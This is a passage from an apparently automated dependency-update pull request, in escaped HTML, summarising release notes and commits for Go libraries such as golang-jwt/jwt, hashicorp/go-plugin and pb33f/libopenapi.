href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ehttps://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/7ceae619e739dc8a7bf577214aa8ebf26668e9db\"\u003e\u003ccode\u003e7ceae61\u003c/code\u003e\u003c/a\u003e Add release.yml for changelog configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/dce8e4dddcc9dc812cdc0b9d2037512d0e4b3eb5\"\u003e\u003ccode\u003edce8e4d\u003c/code\u003e\u003c/a\u003e Set token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/414\"\u003e#414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/8889e208aa5c3736e5f7a856107ee70c046b803e\"\u003e\u003ccode\u003e8889e20\u003c/code\u003e\u003c/a\u003e Save signature to Token struct after successful signing (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/417\"\u003e#417\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d237f8204b397bc008b5b07c4e081beb4ec2a7b1\"\u003e\u003ccode\u003ed237f82\u003c/code\u003e\u003c/a\u003e ci: update github-actions schedule interval to monthly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d8dce95a406fc435aa3d11c5073f2f31a9449116\"\u003e\u003ccode\u003ed8dce95\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.41.0 to 1.42.1 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/492\"\u003e#492\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e93180329eab078116176ff7dc4352760bc5f290\"\u003e\u003ccode\u003ee931803\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.40.0 to 1.41.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/490\"\u003e#490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e6a0afa839d74787501369217245b52bfc75f30d\"\u003e\u003ccode\u003ee6a0afa\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/487\"\u003e#487\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/9f85c9ec9f10fb6919d773cb8df07029639ec76e\"\u003e\u003ccode\u003e9f85c9e\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.39.0 to 1.40.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/488\"\u003e#488\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/60a8669e0221aed55a6abfd9b5cd20472f0c6ebd\"\u003e\u003ccode\u003e60a8669\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/469\"\u003e#469\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/76f582896da76978896d59ced995d7967c33c434\"\u003e\u003ccode\u003e76f5828\u003c/code\u003e\u003c/a\u003e Remove misleading ParserOptions documentation (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/484\"\u003e#484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/hashicorp/go-plugin` from 1.6.3 to 1.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/releases\"\u003egithub.com/hashicorp/go-plugin's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePrint panic output on Error log level by \u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSpend less time preparing to write log lines when the logger is disabled by \u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eComplete the implementation of moving panics to the Error log level by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/353\"\u003ehashicorp/go-plugin#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate changelog for v1.7.0 by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/356\"\u003ehashicorp/go-plugin#356\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KaushikiAnand\"\u003e\u003ccode\u003e@​KaushikiAnand\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/335\"\u003ehashicorp/go-plugin#335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dduzgun-security\"\u003e\u003ccode\u003e@​dduzgun-security\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/337\"\u003ehashicorp/go-plugin#337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhijeetviswa\"\u003e\u003ccode\u003e@​abhijeetviswa\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/342\"\u003ehashicorp/go-plugin#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/compliance-pr-automation-bot\"\u003e\u003ccode\u003e@​compliance-pr-automation-bot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/350\"\u003ehashicorp/go-plugin#350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ehttps://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/blob/main/CHANGELOG.md\"\u003egithub.com/hashicorp/go-plugin's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWhen go-plugin encounters a stack trace on the server stderr stream, it now raises output to a log-level of Error instead of Debug. [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003eGH-292\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDon't spend resources parsing log lines when logging is disabled [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003eGH-352\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for gRPC dial options to the \u003ccode\u003eDial\u003c/code\u003e API [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/257\"\u003eGH-257\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where reattaching to a plugin that exits could kill an unrelated process [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/320\"\u003eGH-320\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.1\u003c/h2\u003e\n\u003cp\u003eBUGS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress spurious \u003ccode\u003eos.ErrClosed\u003c/code\u003e on plugin shutdown [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/299\"\u003eGH-299\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bump google.golang.org/grpc to v1.58.3 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/296\"\u003eGH-296\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.6.0\u003c/h2\u003e\n\u003cp\u003eCHANGES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eplugin: Plugins written in other languages can optionally start to advertise whether they support gRPC broker multiplexing.\nIf the environment variable \u003ccode\u003ePLUGIN_MULTIPLEX_GRPC\u003c/code\u003e is set, it is safe to include a seventh field containing a boolean\nvalue in the \u003ccode\u003e|\u003c/code\u003e-separated protocol negotiation line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSupport muxing gRPC broker connections over a single listener [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/288\"\u003eGH-288\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eclient: Configurable buffer size for reading plugin log lines [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/265\"\u003eGH-265\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebuf\u003c/code\u003e for proto generation [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/286\"\u003eGH-286\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/net to v0.17.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/sys to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003edeps: bump golang.org/x/text to v0.13.0 [\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/285\"\u003eGH-285\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.5.2\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/92fb14e530db1a4d6d1053adb0f823155f52165d\"\u003e\u003ccode\u003e92fb14e\u003c/code\u003e\u003c/a\u003e update changelog for v1.7.0 (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/356\"\u003e#356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/d2a064ec63aa639d29c3d7b64a50776d42982c29\"\u003e\u003ccode\u003ed2a064e\u003c/code\u003e\u003c/a\u003e Complete the implementation of moving panics to the Error log level (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/353\"\u003e#353\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/b02adb3fdfefea44ec04ee09074fcc93a42e6302\"\u003e\u003ccode\u003eb02adb3\u003c/code\u003e\u003c/a\u003e Spend less time preparing to write log lines when the logger is disabled (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/352\"\u003e#352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/a938e9a3385168c366e944d3c16a95a9a9b03d31\"\u003e\u003ccode\u003ea938e9a\u003c/code\u003e\u003c/a\u003e [Compliance] - PR Template Changes Required (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/350\"\u003e#350\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/f4acdfe4f62c0daa216fc951a525ae578daadcae\"\u003e\u003ccode\u003ef4acdfe\u003c/code\u003e\u003c/a\u003e Bump protobuf from 4.24.4 to 4.25.8 in /examples/grpc/plugin-python (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/ba61a6548317254b855e92042150362cd17c7e0c\"\u003e\u003ccode\u003eba61a65\u003c/code\u003e\u003c/a\u003e [chore] : Bump the go group across 2 directories with 7 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/346\"\u003e#346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/64b8d7614c8e0753ad794817a0b034a976bfa97f\"\u003e\u003ccode\u003e64b8d76\u003c/code\u003e\u003c/a\u003e fix additional lint issues and expand linter scope (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/810097c69630b52c15e7ae5e128142069298ab1e\"\u003e\u003ccode\u003e810097c\u003c/code\u003e\u003c/a\u003e [chore] : Bump golang.org/x/net (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/c882484d2f5f3e97a56651924ae0f26e2f84ad74\"\u003e\u003ccode\u003ec882484\u003c/code\u003e\u003c/a\u003e [chore] : Bump the actions group with 3 updates (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/345\"\u003e#345\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hashicorp/go-plugin/commit/21b9619042fccc8b03bd6fe97a977a77f74ca163\"\u003e\u003ccode\u003e21b9619\u003c/code\u003e\u003c/a\u003e IND-3869 enabling dependabot (\u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/hashicorp/go-plugin/compare/v1.6.3...v1.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi` from 0.22.3 to 0.35.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi/releases\"\u003egithub.com/pb33f/libopenapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.35.1\u003c/h2\u003e\n\u003cp\u003eA big refactor of the low-level model, after years of growth and organic changes. runs faster and cooler now, fewer allocations, less memory, and less number crunching. runs fewer instructions faster, all for \u003cstrong\u003efree.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eAlso fixes a bundling glitch that was keeping old references in play in the model after composed bundling.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features.\u003c/p\u003e\n\u003ch2\u003ev0.35.0\u003c/h2\u003e\n\u003cp\u003eThe release fixes an issue where \u003ccode\u003e$id\u003c/code\u003e was being parsed when inside examples. The index module was also heavily refactored to make it easier to read, operate, and understand, a huge cleanup of years of organic growth. Much more to come.\u003c/p\u003e\n\u003cp\u003eNo breaking changes, no new features, 7% more efficient.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/luke-hagar-sp\"\u003e\u003ccode\u003e@​luke-hagar-sp\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.4\u003c/h2\u003e\n\u003cp\u003eFixes security issues and patches issues \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/545\"\u003e#545\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/zhirschtritt\"\u003e\u003ccode\u003e@​zhirschtritt\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.3\u003c/h2\u003e\n\u003cp\u003eAddresses \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/143\"\u003epb33f/wiretap#143\u003c/a\u003e by adding reusable local reference-resolution helpers and ensuring that nested-reference context settings are consistently propagated from document-level config into index/resolver config.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.2\u003c/h2\u003e\n\u003cp\u003eFixes issue \u003ca href=\"https://redirect.github.com/daveshanley/vacuum/issues/821\"\u003edaveshanley/vacuum#821\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.34.1\u003c/h2\u003e\n\u003cp\u003eMinor bugfix for vacuum and some multi-file lookup edge cases, no new features, no breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.34.0\u003c/h2\u003e\n\u003ch2\u003eAdds support for \u003ca href=\"https://spec.openapis.org/arazzo/latest.html\"\u003eArazzo\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eDocs \u003ca href=\"https://pb33f.io/libopenapi/arazzo/\"\u003ehttps://pb33f.io/libopenapi/arazzo/\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eConfigurable JSONPath lookup\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi/pull/535\"\u003epb33f/libopenapi#535\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eUpdates JSONPath lookup in utils to be configuration-aware and safe with recent \u003ca href=\"https://github.com/pb33f/jsonpath\"\u003ehttps://github.com/pb33f/jsonpath\u003c/a\u003e behavior, especially with respect to WithLazyContextTracking().\u003c/p\u003e\n\u003cp\u003eDifferent lookup scenarios need different execution behavior and safety constraints. This keeps existing behavior by default while allowing explicit control and preventing incorrect cache reuse across different JSONPath engine settings.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/andreyyudin\"\u003e\u003ccode\u003e@​andreyyudin\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi/issues/533\"\u003epb33f/libopenapi#533\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eNew \u003ccode\u003eCreateSchemaProxyRefWithSchema(ref string, schema *Schema)\u003c/code\u003e introduced\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix goroutine leak in schema\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/badb17a26aaf89190194e2fbdb1590b08ef25328\"\u003e\u003ccode\u003ebadb17a\u003c/code\u003e\u003c/a\u003e bumping coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/85682e1e48ed2be8cac175ce7ced4f2946c9cf5a\"\u003e\u003ccode\u003e85682e1\u003c/code\u003e\u003c/a\u003e fixing nil checks and borked pipeline.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/cda65e2d632670e0af023c1aa34945f935ec991c\"\u003e\u003ccode\u003ecda65e2\u003c/code\u003e\u003c/a\u003e more model refactoring and cleanup.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/10828caacd4b3253ba2fa9fb4ef930d9eaccdd07\"\u003e\u003ccode\u003e10828ca\u003c/code\u003e\u003c/a\u003e working through model performance refactor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/af72cd2a52fae2f3b16ca9f570f646cb6fc82afd\"\u003e\u003ccode\u003eaf72cd2\u003c/code\u003e\u003c/a\u003e refactoring schema performance and clarity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/65096b4e066d33bd3c9b5d5d4cbf772d584063a5\"\u003e\u003ccode\u003e65096b4\u003c/code\u003e\u003c/a\u003e fix stale references being returned after bundling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/da443c119275140cde89930b81b855d927fbf2b1\"\u003e\u003ccode\u003eda443c1\u003c/code\u003e\u003c/a\u003e rebased and ported luke's work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/2d7f1c67e45831d6d9ac9233f60a07a1cd128a67\"\u003e\u003ccode\u003e2d7f1c6\u003c/code\u003e\u003c/a\u003e address coverage issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/c85f4e8951d7197b96c51ac899c435489050a62e\"\u003e\u003ccode\u003ec85f4e8\u003c/code\u003e\u003c/a\u003e OH WINDOWS. PLEASE. STOP BEING STRANGE\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi/commit/660a62f9fccd506c4d3712adfa005ee4e50e6d46\"\u003e\u003ccode\u003e660a62f\u003c/code\u003e\u003c/a\u003e fixing windows issues.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi/compare/v0.22.3...v0.35.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/pb33f/libopenapi-validator` from 0.4.7 to 0.13.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pb33f/libopenapi-validator/releases\"\u003egithub.com/pb33f/libopenapi-validator's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.13.3\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAnd fixes \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e fully\u003c/p\u003e\n\u003ch2\u003ev0.13.2\u003c/h2\u003e\n\u003cp\u003eFixes issues in wiretap\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eand issues\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.1\u003c/h2\u003e\n\u003cp\u003eAdds support for passing compiled schemas for document validation. Prevents another compilation step, saving on compute and memory.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003cp\u003eRefactored \u003ccode\u003eSchemaValidationFailure \u003c/code\u003estruct fields.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis is a breaking change,\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/188\"\u003epb33f/libopenapi-validator#188\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/200\"\u003epb33f/libopenapi-validator#200\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/mjbonifacio\"\u003e\u003ccode\u003e@​mjbonifacio\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAlso implemented a RadixTree design to speed up path lookup.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/pull/217\"\u003epb33f/libopenapi-validator#217\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/its-hammer-time\"\u003e\u003ccode\u003e@​its-hammer-time\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.1\u003c/h2\u003e\n\u003cp\u003eAdds support for all authentication types.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/x-delfino\"\u003e\u003ccode\u003e@​x-delfino\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003cp\u003eAdds XML body validation with the addition of \u003ccode\u003eAllowXMLBodyValidation\u003c/code\u003e as a configuration option. Also adds support for \u003ccode\u003ex-www-form-urlencoded\u003c/code\u003e validation.\u003c/p\u003e\n\u003cp\u003eNo breaking changes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/ySnoopyDogy\"\u003e\u003ccode\u003e@​ySnoopyDogy\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/1151bc5b91c4862406d096b628d43408f8f48237\"\u003e\u003ccode\u003e1151bc5\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/27\"\u003e#27\u003c/a\u003e fully\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04d2b62899469b2510c63b144204b7e6d6e0dbce\"\u003e\u003ccode\u003e04d2b62\u003c/code\u003e\u003c/a\u003e fully address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/134\"\u003epb33f/wiretap#134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/881f8cbbc7629f6e03c1449d402cbbda1e1f6c58\"\u003e\u003ccode\u003e881f8cb\u003c/code\u003e\u003c/a\u003e cleanup\u003c/li\u003e\n\u003cli\u003e\u003ca 